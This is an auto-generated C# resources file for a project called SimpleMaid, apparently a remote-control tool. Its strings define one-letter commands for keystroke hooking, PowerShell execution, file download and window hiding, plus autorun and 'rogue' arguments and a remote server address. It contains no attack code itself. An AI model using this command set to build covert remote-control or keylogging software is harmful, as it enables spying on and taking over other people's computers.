//------------------------------------------------------------------------------
// <auto-generated>
//     Этот код создан программой.
//     Исполняемая версия:4.0.30319.42000
//
//     Изменения в этом файле могут привести к неправильной работе и будут потеряны в случае
//     повторной генерации кода.
// </auto-generated>
//------------------------------------------------------------------------------

namespace SimpleMaid {
    using System;
    
    
    /// <summary>
    ///   Класс ресурса со строгой типизацией для поиска локализованных строк и т.д.
    /// </summary>
    // Этот класс создан автоматически классом StronglyTypedResourceBuilder
    // с помощью такого средства, как ResGen или Visual Studio.
    // Чтобы добавить или удалить член, измените файл .ResX и снова запустите ResGen
    // с параметром /str или перестройте свой проект VS.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal resources() {
        }
        
        /// <summary>
        ///   Возвращает кэшированный экземпляр ResourceManager, использованный этим классом.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SimpleMaid.resources", typeof(resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Перезаписывает свойство CurrentUICulture текущего потока для всех
        ///   обращений к ресурсу с помощью этого класса ресурса со строгой типизацией.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на None.
        /// </summary>
        internal static string AccountCredentials {
            get {
                return ResourceManager.GetString("AccountCredentials", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на You shouldn&apos;t run this app as administrator. Don&apos;t risk your PC! (:.
        /// </summary>
        internal static string AdminErrorMessage {
            get {
                return ResourceManager.GetString("AdminErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на A: .
        /// </summary>
        internal static string AnswerPrefix {
            get {
                return ResourceManager.GetString("AnswerPrefix", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на -autorun.
        /// </summary>
        internal static string AutorunArgument {
            get {
                return ResourceManager.GetString("AutorunArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Exit.
        /// </summary>
        internal static string btnBidFarewell_Text {
            get {
                return ResourceManager.GetString("btnBidFarewell_Text", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Send message.
        /// </summary>
        internal static string btnSendLetter_Text {
            get {
                return ResourceManager.GetString("btnSendLetter_Text", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Chat thread has started..
        /// </summary>
        internal static string ChatStart {
            get {
                return ResourceManager.GetString("ChatStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Chat thread has stopped..
        /// </summary>
        internal static string ChatStop {
            get {
                return ResourceManager.GetString("ChatStop", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на ;.
        /// </summary>
        internal static string CommandsSeparator {
            get {
                return ResourceManager.GetString("CommandsSeparator", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Command thread has started..
        /// </summary>
        internal static string CommandStart {
            get {
                return ResourceManager.GetString("CommandStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Command thread has stopped..
        /// </summary>
        internal static string CommandStop {
            get {
                return ResourceManager.GetString("CommandStop", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Configuration.ini.
        /// </summary>
        internal static string ConfigName {
            get {
                return ResourceManager.GetString("ConfigName", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Connection thread has started..
        /// </summary>
        internal static string ConnectionStart {
            get {
                return ResourceManager.GetString("ConnectionStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Connection thread has stopped..
        /// </summary>
        internal static string ConnectionStop {
            get {
                return ResourceManager.GetString("ConnectionStop", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на d.
        /// </summary>
        internal static string DownloadCommand {
            get {
                return ResourceManager.GetString("DownloadCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на nul(.
        /// </summary>
        internal static string EvaluateCmdVariable {
            get {
                return ResourceManager.GetString("EvaluateCmdVariable", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на ).
        /// </summary>
        internal static string EvaluateCmdVariableEnd {
            get {
                return ResourceManager.GetString("EvaluateCmdVariableEnd", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на ..
        /// </summary>
        internal static string ForbiddenPassword {
            get {
                return ResourceManager.GetString("ForbiddenPassword", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 3000.
        /// </summary>
        internal static string GeneralExitDelay {
            get {
                return ResourceManager.GetString("GeneralExitDelay", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на OK!.
        /// </summary>
        internal static string GeneralOKMessage {
            get {
                return ResourceManager.GetString("GeneralOKMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на h.
        /// </summary>
        internal static string HideCommand {
            get {
                return ResourceManager.GetString("HideCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на One good turn deserves another..
        /// </summary>
        internal static string IncompleteCommandErrMsg {
            get {
                return ResourceManager.GetString("IncompleteCommandErrMsg", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на 500.
        /// </summary>
        internal static string IndividualValueLimit {
            get {
                return ResourceManager.GetString("IndividualValueLimit", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на k.
        /// </summary>
        internal static string KeyhookCommand {
            get {
                return ResourceManager.GetString("KeyhookCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на d.
        /// </summary>
        internal static string KeywordDefault {
            get {
                return ResourceManager.GetString("KeywordDefault", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на m.
        /// </summary>
        internal static string MessageCommand {
            get {
                return ResourceManager.GetString("MessageCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на What did you do?!.
        /// </summary>
        internal static string OldnewErrorMessage {
            get {
                return ResourceManager.GetString("OldnewErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на This app only suports Windows, sorry..
        /// </summary>
        internal static string OSErrorMessage {
            get {
                return ResourceManager.GetString("OSErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на -pass.
        /// </summary>
        internal static string PasswordArgument {
            get {
                return ResourceManager.GetString("PasswordArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Please, setup a password: .
        /// </summary>
        internal static string PasswordEnterTip {
            get {
                return ResourceManager.GetString("PasswordEnterTip", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на What else can you be when the world can only see a MONSTER?.
        /// </summary>
        internal static string PastSins {
            get {
                return ResourceManager.GetString("PastSins", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на p.
        /// </summary>
        internal static string PowershellCommand {
            get {
                return ResourceManager.GetString("PowershellCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на q.
        /// </summary>
        internal static string QuitCommand {
            get {
                return ResourceManager.GetString("QuitCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на r.
        /// </summary>
        internal static string RepeatCommand {
            get {
                return ResourceManager.GetString("RepeatCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на -rogue.
        /// </summary>
        internal static string RogueArgument {
            get {
                return ResourceManager.GetString("RogueArgument", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на http://appinvtinywebdb.appspot.com/.
        /// </summary>
        internal static string ServerAddress {
            get {
                return ResourceManager.GetString("ServerAddress", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на s.
        /// </summary>
        internal static string ShowCommand {
            get {
                return ResourceManager.GetString("ShowCommand", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Time thread has started..
        /// </summary>
        internal static string TimeStart {
            get {
                return ResourceManager.GetString("TimeStart", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на Problem connecting to server. Check your internet connection..
        /// </summary>
        internal static string WebErrorMessage {
            get {
                return ResourceManager.GetString("WebErrorMessage", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на A typo: .
        /// </summary>
        internal static string WrongCommandErrMsg {
            get {
                return ResourceManager.GetString("WrongCommandErrMsg", resourceCulture);
            }
        }
    }
}
